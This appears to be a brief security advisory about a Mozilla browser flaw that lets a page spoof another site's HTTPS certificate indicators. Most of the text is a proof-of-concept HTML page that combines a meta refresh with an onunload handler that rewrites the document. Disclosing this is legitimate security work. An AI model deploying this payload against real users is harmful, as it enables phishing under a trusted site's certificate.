Mozilla Browser Refresh Security Property Spoofing Vulnerability

Mozilla Browser Refresh Security Property Spoofing Vulnerability

No exploit is required to leverage this issue. The following proof of concept has been provided:

< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV="REFRESH" CONTENT="0;URL=https://www.example.com">
< /HEAD>
< BODY
onunload="
document.close();
document.writeln('< body onload=document.close();break;>
< h3>It is Great to Use example's Cert!');

document.close();
window.location.reload();
">
< /body>